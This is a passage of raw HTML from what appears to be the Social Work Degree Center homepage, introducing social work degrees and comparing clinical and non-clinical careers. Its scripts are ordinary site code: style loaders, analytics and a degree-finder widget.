rgba(0,0,0,.15)}.current-menu-item.menu-item a{margin-left:0;margin-right:0}}.header-menu-trigger{background-color:rgba(0,0,0,.2);border-radius:3px;box-shadow:1px 2px 3px rgba(0,0,0,.15);display:inline-block;font-size:34px;height:50px;padding-top:8px;position:absolute;top:0;text-align:center;text-transform:uppercase;width:50px;z-index:10}@media all and (min-width:900px){.header-standard .header-menu-wrap{margin-top:-25px;position:absolute;right:0;top:50%}.header-menu-trigger{display:none}}@media all and (max-width:900px){.header-menu{display:none}.header-menu .menu-item{display:block}}.image-overlay{background-position:center top;background-size:cover;display:block;position:relative}.image-overlay:after{content:" ";display:block;height:100%;position:absolute;bottom:0;left:0;right:0;top:0;width:100%;z-index:-1}@media all and (max-width:900px){.header-wrap,.content-box{margin-bottom:0;margin-top:0}.content-box{padding-left:0;padding-right:0}}@media all and (max-width:800px){[class*="format-text-"] .alignright{clear:both;display:block;float:none;margin-left:auto!important;margin-right:auto!important;text-align:center}}@media all and (max-width:700px){button{display:block;text-align:center;width:100%}}[class*="md-icon-"]:before{font-family:md-icon;font-style:normal;font-weight:400;speak:none;display:inline-block;text-decoration:inherit;text-align:center;font-variant:normal;text-transform:none;line-height:1}.md-icon-menu:before{content:'\e815'}</style><link rel="canonical" href="https://www.socialworkdegreecenter.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Welcome To Social Work Degree Center! - Social Work Degree Center" /><meta property="og:description" content="We hope to help you find everything you want to know about Social Work Degrees! From undergraduate to PhD, we will help you prepare for a career in social work! Here you can learn: What Social Work is How to apply and get accepted into accredited programs How to become a Licensed Social Worker How &hellip;" /><meta property="og:url" content="https://www.socialworkdegreecenter.com/" /><meta property="og:site_name" content="Social Work Degree Center" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.socialworkdegreecenter.com/#organization","name":"","url":"https://www.socialworkdegreecenter.com/","sameAs":[]},{"@type":"WebSite","@id":"https://www.socialworkdegreecenter.com/#website","url":"https://www.socialworkdegreecenter.com/","name":"Social Work Degree Center","publisher":{"@id":"https://www.socialworkdegreecenter.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.socialworkdegreecenter.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.socialworkdegreecenter.com/#webpage","url":"https://www.socialworkdegreecenter.com/","inLanguage":"en-US","name":"Welcome To Social Work Degree Center! - Social Work Degree Center","isPartOf":{"@id":"https://www.socialworkdegreecenter.com/#website"},"about":{"@id":"https://www.socialworkdegreecenter.com/#organization"},"image":{"@type":"ImageObject","@id":"https://www.socialworkdegreecenter.com/#primaryimage","url":"https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker.jpg","width":431,"height":300},"primaryImageOfPage":{"@id":"https://www.socialworkdegreecenter.com/#primaryimage"},"datePublished":"2013-07-11T15:08:04+00:00","dateModified":"2018-07-26T17:34:32+00:00"}]}</script> <link rel='dns-prefetch' href='//socialworkdegreecenter.azureedge.net' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><style type="text/css">img.wp-smiley,img.emoji{display:inline!important;border:none!important;box-shadow:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-0.1em!important;background:none!important;padding:0!important}</style><link rel='preload' id='marketers-delight-google-fonts-css' href='https://fonts.googleapis.com/css?family=Cabin%3Anormal%2C%7CRoboto+Condensed&#038;ver=5.2' as="style" onload="this.onload=null;this.rel='stylesheet'" type='text/css' media='all' /><link rel='preload' id='marketers-delight-design-css' href='https://socialworkdegreecenter.azureedge.net/wp-content/themes/marketers-delight/design.css' as="style" onload="this.onload=null;this.rel='stylesheet'" type='text/css' media='all' /><link rel='preload' id='marketers-delight-css' href='https://socialworkdegreecenter.azureedge.net/wp-content/themes/marketers-delight/style.css' as="style" onload="this.onload=null;this.rel='stylesheet'" type='text/css' media='all' /><link rel='preload' id='wp-block-library-css' href='https://cdn.jsdelivr.net/gh/WordPress/[email protected]/wp-includes/css/dist/block-library/style.min.css' as="style" onload="this.onload=null;this.rel='stylesheet'" type='text/css' media='all' /><link rel='preload' id='hide_updates_css-css' href='https://cdn.jsdelivr.net/wp/hide-updates/tags/1.1.3/hide-updates.css' as="style" onload="this.onload=null;this.rel='stylesheet'" type='text/css' media='all' /><link rel='preload' id='chld_thm_cfg_child-css' href='https://socialworkdegreecenter.azureedge.net/wp-content/cache/busting/1/wp-content/themes/marketers-delight-child/style-1.0.1532624220.css' as="style" onload="this.onload=null;this.rel='stylesheet'" type='text/css' media='all' /><style id='rocket-lazyload-inline-css' type='text/css'>.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;cursor:pointer;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:72px;width:72px;left:50%;top:50%;margin-left:-36px;margin-top:-36px;position:absolute;background:url(https://socialworkdegreecenter.azureedge.net/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat;cursor:pointer}</style> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://cdn.jsdelivr.net/wp/jquery-updater/tags/3.4.0/js/jquery-3.4.0.min.js'></script> <script type='text/javascript' src='https://cdn.jsdelivr.net/wp/jquery-updater/tags/3.4.0/js/jquery-migrate-3.0.0.min.js'></script> <link rel='https://api.w.org/' href='https://www.socialworkdegreecenter.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.socialworkdegreecenter.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.socialworkdegreecenter.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.2" /><link rel='shortlink' href='https://www.socialworkdegreecenter.com/' /><style type='text/css'>.degree-finder-wrapper{margin-bottom:16px!important}</style><link rel="preload" href="https://www.socialworkdegreecenter.com/wp-content/plugins/graceful-pull-quotes/resources/jspullquotes-core.css" as="style" onload="this.onload=null;this.rel='stylesheet'" type="text/css" /><link rel="preload" href="https://www.socialworkdegreecenter.com/wp-content/plugins/graceful-pull-quotes/styles/Default.css" as="style" onload="this.onload=null;this.rel='stylesheet'" type="text/css" /> <script type="text/javascript">var jspq_options = new Array("1", "1", "right", "1", "1", "blockquote", "pullquote", "pullquote pqRight");</script> <script type="text/javascript" src="https://www.socialworkdegreecenter.com/wp-content/plugins/graceful-pull-quotes/resources/jspullquotes.js"></script> <link rel="alternate" type="application/rss+xml" title="Social Work Degree Center Feed" href="https://www.socialworkdegreecenter.com/feed/"><script type="text/javascript">var clicky_site_ids = clicky_site_ids || []; clicky_site_ids.push(21150); (function() { var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = ( document.location.protocol == 'https:' ? 'https://pmetrics.performancing.com/js' : 'http://pmetrics.performancing.com/js' ); ( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0] ).appendChild( s ); })();</script> <noscript><p><img alt="Performancing Metrics" width="1" height="1" src="//pmetrics.performancing.com/21150ns.gif" /></p></noscript> <noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player,[data-lazy-src]{display:none!important}</style></noscript><script>/*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */ (function(w){"use strict";if(!w.loadCSS){w.loadCSS=function(){}} var rp=loadCSS.relpreload={};rp.support=(function(){var ret;try{ret=w.document.createElement("link").relList.supports("preload")}catch(e){ret=!1} return function(){return ret}})();rp.bindMediaToggle=function(link){var finalMedia=link.media||"all";function enableStylesheet(){link.media=finalMedia} if(link.addEventListener){link.addEventListener("load",enableStylesheet)}else if(link.attachEvent){link.attachEvent("onload",enableStylesheet)} setTimeout(function(){link.rel="stylesheet";link.media="only x"});setTimeout(enableStylesheet,3000)};rp.poly=function(){if(rp.support()){return} var links=w.document.getElementsByTagName("link");for(var i=0;i<links.length;i++){var link=links[i];if(link.rel==="preload"&&link.getAttribute("as")==="style"&&!link.getAttribute("data-loadcss")){link.setAttribute("data-loadcss",!0);rp.bindMediaToggle(link)}}};if(!rp.support()){rp.poly();var run=w.setInterval(rp.poly,500);if(w.addEventListener){w.addEventListener("load",function(){rp.poly();w.clearInterval(run)})}else if(w.attachEvent){w.attachEvent("onload",function(){rp.poly();w.clearInterval(run)})}} if(typeof exports!=="undefined"){exports.loadCSS=loadCSS} else{w.loadCSS=loadCSS}}(typeof global!=="undefined"?global:this))</script></head><body data-rsssl=1 class="home page-template-default page page-id-5 wp-custom-logo" itemtype="http://schema.org/WebPage"><div id="header_wrap" class="header-wrap"><header id="header" class="header header-standard" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"> <span id="header-menu-trigger" class="header-menu-trigger md-icon md-icon-menu"></span> <a href="https://www.socialworkdegreecenter.com/" class="custom-logo-link" rel="home"><img width="16848" height="3100" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2016848%203100'%3E%3C/svg%3E" class="custom-logo" alt="Social Work Degree Center" data-lazy-srcset="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1.png 16848w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1-300x55.png 300w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1-768x141.png 768w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1-1024x188.png 1024w" data-lazy-sizes="(max-width: 16848px) 100vw, 16848px" data-lazy-src="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1.png" /><noscript><img width="16848" height="3100" src="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1.png" class="custom-logo" alt="Social Work Degree Center" srcset="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1.png 16848w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1-300x55.png 300w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1-768x141.png 768w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/color_logo_transparent-1-1024x188.png 1024w" sizes="(max-width: 16848px) 100vw, 16848px" /></noscript></a><p class="logo" itemprop="headline"></p><div id="header-menu" class="header-menu-wrap"><nav class="header-menu" itemscope itemtype="http://schema.org/SiteNavigationElement"><ul id="menu-header-menu" class="menu menu-header"><li id="menu-item-2014" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-5 current_page_item menu-item-2014"><a href="https://www.socialworkdegreecenter.com/" itemprop="url"><span class="menu-item-title" itemprop="name">Home</span></a></li><li id="menu-item-2015" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2015"><a href="https://www.socialworkdegreecenter.com/features/" itemprop="url"><span class="menu-item-title" itemprop="name">Features</span></a></li><li id="menu-item-2016" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2016"><a href="https://www.socialworkdegreecenter.com/frequently-asked-questions/" itemprop="url"><span class="menu-item-title" itemprop="name">FAQ</span></a></li><li id="menu-item-2017" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2017"><a href="https://www.socialworkdegreecenter.com/category/uncategorized/" itemprop="url"><span class="menu-item-title" itemprop="name">Rankings</span></a></li></ul></nav></div></div></header><div class="content-item-headline content-item featured-image-cover image-overlay format-text-main"><div class="block-triple inner"><h1 class="headline entry-title">Welcome To Social Work Degree Center!</h1></div></div></div><div id="content-box" class="content-box is-content-box has-sidebar sidebar-content inner format-text-main"><main id="content" class="content" role="main"><article id="content-5" class="post-5 page type-page status-publish hentry has-inline-post-thumbnail" itemscope itemtype="http://schema.org/Article"><div id="content-5-schema"><meta itemscope itemprop="mainEntityOfPage" itemtype="https://schema.org/WebPage" itemid="https://www.socialworkdegreecenter.com/" /><meta itemscope itemprop="headline" content="Welcome To Social Work Degree Center!" /><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="name" content="rebecca"></meta></div><meta itemprop="datePublished" content="2013-07-11T08:08:04-07:00" /><meta itemprop="dateModified" class="updated" content="2018-07-26 " /><div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Social Work Degree Center"></div></div><div class="content-item-text content-item inner block-double" itemprop="text"><p><a href="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker.jpg"><img class="alignright size-medium wp-image-202" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20208'%3E%3C/svg%3E" alt="Social Work Degree Center" width="300" height="208" data-lazy-srcset="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker-300x208.jpg 300w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker.jpg 431w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker-300x208.jpg" /><noscript><img class="alignright size-medium wp-image-202" src="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker-300x208.jpg" alt="Social Work Degree Center" width="300" height="208" srcset="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker-300x208.jpg 300w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/social-worker.jpg 431w" sizes="(max-width: 300px) 100vw, 300px" /></noscript></a>We hope to help you find everything you want to know about Social Work Degrees!</p><p>From undergraduate to PhD, we will help you prepare for a career in social work!</p><p>Here you can learn:</p><blockquote><p>What <a href="https://www.socialworkdegreecenter.com/what-is-social-work/">Social Work </a> is<br /> How to <a href="https://www.socialworkdegreecenter.com/applying-and-getting-accepted-into-accredited-social-work-degree-programs/">apply and get accepted </a>into accredited programs<br /> How to become a <a href="https://www.socialworkdegreecenter.com/how-to-become-a-licensed-social-worker/">Licensed Social Worker </a><br /> How to select the <a href="https://www.socialworkdegreecenter.com/rankings/">best school </a>to meet your educational needs<br /> How to establish the <a href="https://www.socialworkdegreecenter.com/what-are-the-different-types-of-social-work-degrees/">educational foundation </a> necessary to launch a career in social work<br /> How to find <a href="https://www.socialworkdegreecenter.com/rankings/">social work programs</a> both undergraduate and <a href="https://www.socialworkdegreecenter.com/ranking-online-masters-in-social-work-msw/">MSW</a> which enhance employability and refine your skills while maximizing your time and financial investments<br /> How to source <a href="https://www.socialworkdegreecenter.com/how-to-source-scholarships-and-other-means-of-covering-tuition-costs/">scholarships and other means of covering </a> tuition costs<br /> What <a href="https://www.socialworkdegreecenter.com/what-can-i-do-with-a-social-work-degree">careers</a> you qualify for upon graduating with your social work degree</p></blockquote><p>&#8230;and much more!</p><p>&nbsp;</p><h2>To help you get a better understanding of the important aspects of social work, start here:</h2><p><a href="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/redarrow.png"><img class="alignright size-thumbnail wp-image-1013" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20150%20150'%3E%3C/svg%3E" alt="Social Work Degree Center" width="150" height="150" data-lazy-srcset="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/redarrow-150x150.png 150w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/redarrow.png 225w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" data-lazy-src="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/redarrow-150x150.png" /><noscript><img class="alignright size-thumbnail wp-image-1013" src="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/redarrow-150x150.png" alt="Social Work Degree Center" width="150" height="150" srcset="https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/redarrow-150x150.png 150w, https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2013/07/redarrow.png 225w" sizes="(max-width: 150px) 100vw, 150px" /></noscript></a></p><p><a href="https://www.socialworkdegreecenter.com/careerguide/">Social work</a> is a human services profession that&#8217;s concerned with improving the quality of life for individuals, families, groups, and communities. Becoming a social worker will place you on the frontlines advocating for social justice and addressing challenges that thwart well-being. Social work is a licensed field that requires professionals to hold at least a Bachelor of Social Work (BSW) degree. Choosing this education pathway can pay off though because <a href="http://www.bls.gov/ooh/community-and-social-service/social-workers.htm#tab-6">employment of social workers</a> is expected to rise by 12 percent through 2024. The expected 74,800 new jobs will be divided into social work&#8217;s two main groups: clinical and non-clinical. Below we&#8217;ll compare the two subsets to determine your vocational calling in social work.</p><h2>Clinical Social Work</h2><p>As its name suggests, clinical social work is a healthcare profession focused on the diagnosis, treatment, and prevention of psychological disturbances. Clinical social workers design therapeutic interventions that help clients change maladaptive behavior or cope with unalterable situations. They&#8217;re mental health practitioners who apply strengths-based approaches to strengthen clients&#8217; functioning. Clinical social work jobs are involved with treating anxiety, PTSD, alcoholism, eating disorders, autism, and more. It&#8217;s estimated that there are 155,590 clinical social workers in the United States earning an <a href="http://www.bls.gov/oes/current/oes211022.htm">average yearly salary</a> of $54,020. Practicing in clinical social work will require an accredited MSW degree and state licensing as a <a href="https://www.socialworkdegreecenter.com/how-to-become-a-licensed-social-worker/">LCSW</a>.</p><p>Clinical social work is a large division offering diverse areas of specialization for treating people who aren&#8217;t healthy mentally. Every type of clinical social worker establishes a trust relationship for evaluating and resolving issues that affect client health. For example, some popular clinical specialties are:</p><ul><li>Substance abuse social worker: Focus on leading clients through withdrawal and recovery from drug addiction.</li><li>Trauma social worker: Care for individuals who&#8217;re suffering lasting effects from violence, disaster, and grief.</li><li>Oncology social worker: Devoted to addressing the emotional impact and stress of cancer diagnoses.</li><li>Geriatric social worker: Guide elderly adults through aging, especially those with Alzheimer&#8217;s disease.</li><li>Palliative care social worker: Relieve physical and emotional pain for hospice patients facing terminal illness.</li><li>HIV/AIDS social worker: Advocate for individuals and families affected by these immune deficiency syndromes.</li></ul><h2>Non-Clinical Social Work</h2><p>Non-clinical social work is literally the opposite; it&#8217;s concerned with helping healthy clients navigate everyday issues outside the healthcare arena. Most non-clinical jobs are offered by private, nonprofit, and charitable organizations rather than medical facilities. Becoming a non-clinical social worker equates to fighting to eliminate key societal problems like discrimination and homelessness. Non-clinical social work can take place at the micro, mezzo, or macro level to influence interventions across entire troubled communities. These careers have less education constraints, so holding a BSW degree could be sufficient. Non-clinical social workers make slightly less than clinical professionals with an <a href="http://www.bls.gov/oes/current/oes211021.htm">average annual wage</a> of $46,610 though.</p><p>Unlike clinical social work, this division focuses on removing roadblocks for clients whose basic physical or emotional needs aren&#8217;t being met due to injustice. Several specialization areas are available for non-clinical social workers to leave lasting marks on citizens&#8217; lives. For instance, popular non-clinical careers are:</p><ul><li>Military social worker: Attend to the unique needs of Armed Forces veterans returning to civilian life.</li><li>School social worker: Create plans to improve K-12 students&#8217; academic, social, and career development.</li><li>Child welfare social worker: Protect children from situations of abuse and neglect for positive home life.</li><li>Occupational social worker: Help workers resolve problems impacting their job search and performance.</li><li>Corrections social worker: Rehabilitate criminals and foster a successful transition back into society.</li><li>Community social worker: Establish social service programs to give needed resources to marginalized peoples.</li></ul><h2>Choosing the Right Career Avenue</h2><p>Social work is the ideal career path for compassionate individuals who want to relieve suffering and make a difference in others&#8217; lives. Few recognize how truly diverse the social work field is though. Social workers can work in clinical facilities like hospitals, hospices, mental health clinics, and rehabs as well as non-clinical offices like social service agencies, schools, nonprofits, and governments. <a href="https://www.socialworkdegreecenter.com/careers/">Choosing the right profession</a> placement in social work will require introspection on your overall goals. Decide whether you&#8217;re interested in working with children, refugees, the sick, senior citizens, or another population. Now that you know the difference between clinical vs. non-clinical social work, you can make an informed career move.</p><h2>Now check out more of our great articles by going here to learn everything you can about being a social worker:</h2><p><a href="https://www.socialworkdegreecenter.com/features/">Feature Articles In Social Work</a><br /> <a href="https://www.socialworkdegreecenter.com/frequently-asked-questions/">Frequently Asked Questions about Social Work Degrees, Training, and Jobs</a><br /> <a href="https://www.socialworkdegreecenter.com/careers/">Careers in Social Work</a><br /> <a href="https://www.socialworkdegreecenter.com/rankings/">Rankings</a></p></div></article></main><aside class="sidebar" role="complementary" itemscope itemtype="http://schema.org/WPSideBar"><div id="degree-finder"><div class="degree-finder-wrapper"> <script>window.HE = window.HE || {}; window.HE.me = window.HE.me || {}; window.HE.contextualDefaults = window.HE.contextualDefaults || {};</script> <div data-ssr data-widget="ssr-qdf" data-background-color="#37b8eb" data-cta="Search Now" data-cta-color="#d0323e" data-height="325" data-title="Find Your Degree" data-title-color="#266586" data-publisher="socialworkdegreecenter.com" data-url="https://www.socialworkdegreecenter.com/" class="ssr-qdf-cf65b020-77d8-11e9-a3d2-374b8cd52a9e"><style>#platform-quick-degree-finder label.css-ft45iw{box-sizing:border-box;padding-top:0;padding-right:15px;padding-bottom:0;padding-left:15px;width:100%;display:block;margin:17.875px 0;cursor:inherit;opacity:inherit;max-height:inherit;position:relative;top:auto}#platform-quick-degree-finder span.css-wi7yug{box-sizing:border-box;display:none;margin:0;padding:0;line-height:0}#platform-quick-degree-finder span.css-sc8ma5{box-sizing:border-box;color:#000;font-size:15px;font-weight:700;height:40.625px;left:15px;line-height:40.625px;position:absolute;text-align:center;-webkit-transition:background-color .1s ease-in-out;transition:background-color .1s ease-in-out;width:35px;z-index:1}#platform-quick-degree-finder span.css-sc8ma5:before{content:"1"}#platform-quick-degree-finder span.css-q70zm6{box-sizing:border-box;color:#000;font-size:15px;font-weight:700;height:40.625px;left:15px;line-height:40.625px;position:absolute;text-align:center;-webkit-transition:background-color .1s ease-in-out;transition:background-color .1s ease-in-out;width:35px;z-index:1}#platform-quick-degree-finder span.css-q70zm6:before{content:"2"}#platform-quick-degree-finder span.css-1asxcka{box-sizing:border-box;color:#000;font-size:15px;font-weight:700;height:40.625px;left:15px;line-height:40.625px;position:absolute;text-align:center;-webkit-transition:background-color .1s ease-in-out;transition:background-color .1s ease-in-out;width:35px;z-index:1}#platform-quick-degree-finder span.css-1asxcka:before{content:"3"}#platform-quick-degree-finder small.css-1ga7xs5{box-sizing:border-box;color:rgb(0,0,0);display:block;font-size:8.125px;line-height:inherit;padding:6.5px;opacity:.6;text-align:center;text-transform:uppercase;margin:0}#platform-quick-degree-finder button.css-b9e76i{background:#d0323e;border:none;border-radius:3px;box-shadow:0 -3.25px 0 rgba(0,0,0,.2) inset;box-sizing:border-box;color:rgb(255,255,255);cursor:pointer;font-size:16.25px;width:calc(100% - 30px);height:40.625px;margin:15px 15px 0 15px;-webkit-transition:background-color 300ms ease-out;transition:background-color 300ms ease-out;padding:0;float:none;max-width:100%}#platform-quick-degree-finder button.css-b9e76i:disabled{cursor:not-allowed;opacity:.6}#platform-quick-degree-finder button.css-b9e76i:hover{background:#D13340}#platform-quick-degree-finder select.css-xpxpqm{color:#393939;-webkit-appearance:none;-moz-appearance:none;appearance:none;border-radius:3px;background-color:#fff;background-image:url(data:image/svg+xml;charset=US-ASCII,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22276.7%22%20height%3D%22153%22%20viewBox%3D%220%200%20276.7%20153%22%20enable-background%3D%22new%200%200%20276.7%20153%22%3E%3Cstyle%3E.arrow%7Bfill%3A%23393939%3B%7D%3C%2Fstyle%3E%3Cpath%20class%3D%22arrow%22%20d%3D%22M276.7%200H0l138.2%20153z%22%20%2F%3E%3C%2Fsvg%3E),linear-gradient(rgb(255,255,255) 0,rgb(237,237,237) 100%);background-position:right 13px center,left top;background-repeat:no-repeat;background-size:auto 5px,auto;-webkit-transition:border-color 0.1s ease-in-out;transition:border-color 0.1s ease-in-out;border:2px solid rgba(130,130,130,.33);box-sizing:border-box;cursor:pointer;font-size:15px;font-weight:400;height:40.625px;padding:0 32.5px 0 35px;text-transform:inherit;width:100%;outline:none;margin:0;opacity:1;box-shadow:none;max-width:100%;text-transform:none}#platform-quick-degree-finder select.css-xpxpqm:focus{border:2px solid #d0323e}#platform-quick-degree-finder select.css-xpxpqm:focus::-ms-value{background:none;color:#393939}#platform-quick-degree-finder select.css-xpxpqm:-moz-focusring{color:transparent;text-shadow:0 0 0 #000}#platform-quick-degree-finder select.css-xpxpqm::-ms-expand{display:none}#platform-quick-degree-finder select.css-xpxpqm:disabled{cursor:not-allowed}#platform-quick-degree-finder legend.css-s068wi{background:#266586;border:0;box-sizing:border-box;color:rgb(255,255,255);height:22%;font-size:22.75px;font-weight:700;line-height:48.75px;margin:0;text-align:center;text-transform:none;padding:0 0;width:100%}form#platform-quick-degree-finder.css-1xoe9sh{background:#37b8eb;background-image:linear-gradient(#37b8eb 0,#1DAFE9 100%);border-radius:3px;box-shadow:rgba(0,0,0,.1) 0 3.25px 13px,rgba(0,0,0,.5) 0 0 1px;box-sizing:border-box;counter-reset:labels;font-size:3.25px;height:325px;line-height:1.5;margin:auto;text-rendering:optimizeLegibility;white-space:nowrap;width:300px;overflow:hidden;padding:0;border:0}#platform-quick-degree-finder div.css-1pglp10{background:#37b8eb;border:none;border-bottom:1px solid rgba(0,0,0,.15);box-sizing:border-box;height:75%;margin:0;padding:0 0 15px 0}</style><div><form action="https://platform.highereducation.com/track/quick-degree-finder-widget-submit" id="platform-quick-degree-finder" method="POST" data-monetization-impression="true" class="css-1xoe9sh"><div class="css-1pglp10"><legend class="css-s068wi">Find Your Degree</legend><label step="1" class="css-ft45iw"><span class="css-wi7yug">Select a Degree Level</span><span step="1" class="css-sc8ma5"></span><select class="css-xpxpqm" name="degree"><option selected="" value="">Select a Degree</option><option value="1">Associate&#x27;s</option><option value="2">Bachelor&#x27;s</option><option value="3">Master&#x27;s</option><option value="4">Doctorate</option><option value="5">Non-Degree Courses</option><option value="6">Certificate / Diploma</option><option value="7">Graduate Certificates</option></select></label><label step="2" class="css-ft45iw"><span class="css-wi7yug">Select a Category</span><span step="2" class="css-q70zm6"></span><select class="css-xpxpqm" name="category"><option selected="" value="">Select a Category</option><option value="10">Art &amp; Design</option><option value="1">Business &amp; Management</option><option value="7">Computers &amp; Technology</option><option value="2">Criminal Justice &amp; Legal</option><option value="3">Education &amp; Teaching</option><option value="8">Liberal Arts &amp; Humanities</option><option value="5">Nursing &amp; Healthcare</option><option value="11">Psychology &amp; Counseling</option><option value="4">Science &amp; Engineering</option><option value="9">Trades &amp; Careers</option></select></label><label step="3" class="css-ft45iw"><span class="css-wi7yug">Select a Subject</span><span step="3" class="css-1asxcka"></span><select class="css-xpxpqm" name="subject"><option selected="" value="">Select a Subject</option><optgroup label="Art &amp; Design"><option value="228">Animation</option><option value="27">Art &amp; Art History</option><option value="147">Creative / Design</option><option value="133">Fashion</option><option value="227">Film</option><option value="134">Game Design</option><option value="161">Graphic Design</option><option value="226">Interior Design</option><option value="256">Landscape Architecture</option><option value="157">Multimedia Design</option><option value="221">Photography</option><option value="278">Visual Communications</option><option value="16">Web Design</option></optgroup><optgroup label="Business &amp; Management"><option value="30">Accounting</option><option value="208">Business Administration</option><option value="299">Business Intelligence</option><option value="109">Economics</option><option value="166">Entertainment Management</option><option value="51">Entrepreneurship</option><option value="21">Finance</option><option value="260">Forensic Accounting</option><option value="116">Hospitality Management</option><option value="241">Hotel &amp; Restaurant Management</option><option value="3">Human Resources</option><option value="8">International Business</option><option value="180">Internet Marketing</option><option value="293">Logistics</option><option value="9">Management</option><option value="282">Management Information Systems</option><option value="22">Marketing</option><option value="174">Non-Profit Management</option><option value="48">Organizational Leadership</option><option value="11">Project Management</option><option value="181">Public Relations</option><option value="205">Real Estate</option><option value="31">Retail &amp; Sales Management</option><option value="182">Risk Management</option><option value="232">Small Business</option><option value="32">Sports Management</option><option value="10">Supply Chain &amp; Logistics</option><option value="183">Taxation</option><option value="230">Training &amp; Development</option></optgroup><optgroup label="Computers &amp; Technology"><option value="175">Computer Engineering</option><option value="266">Computer Forensics</option><option value="15">Computer Programming</option><option value="34">Computer Science</option><option value="138">Database Management</option><option value="13">Information Systems Security</option><option value="58">Information Technology</option><option value="23">Internet Security</option><option value="163">Mobile Development</option><option value="14">Network Administration</option><option value="125">Network Security</option><option value="128">Software Engineering</option><option value="54">Web Development</option></optgroup><optgroup label="Criminal Justice &amp; Legal"><option value="156">Corrections</option><option value="76">Crime Scene Investigation</option><option value="7">Criminal Justice</option><option value="184">Criminology</option><option value="185">Cyber Security</option><option value="100">Forensic Science</option><option value="60">Homeland Security</option><option value="20">Law Enforcement</option><option value="99">Legal Studies</option><option value="77">Paralegal</option><option value="57">Public Safety Administration</option></optgroup><optgroup label="Education &amp; Teaching"><option value="234">Adult Education/Learning</option><option value="188">Child Development</option><option value="243">Coaching</option><option value="189">Curriculum &amp; Instruction</option><option value="35">Early Childhood Education</option><option value="24">Education</option><option value="111">Educational Administration</option><option value="190">Educational Counseling</option><option value="122">Educational Leadership</option><option value="52">Educational Technology</option><option value="223">Elementary Education</option><option value="191">English Language Learning</option><option value="61">Higher Education</option><option value="36">K-12 Education</option><option value="210">Library Science</option><option value="193">Math Education</option><option value="162">Music Education</option><option value="170">Online Teaching</option><option value="70">Reading &amp; Literacy</option><option value="64">Special Education</option><option value="37">Teacher Licensure</option></optgroup><optgroup label="Liberal Arts &amp; Humanities"><option value="214">Anthropology</option><option value="33">Communications</option><option value="28">English</option><option value="79">General Studies</option><option value="201">Geography</option><option value="169">History</option><option value="242">Human 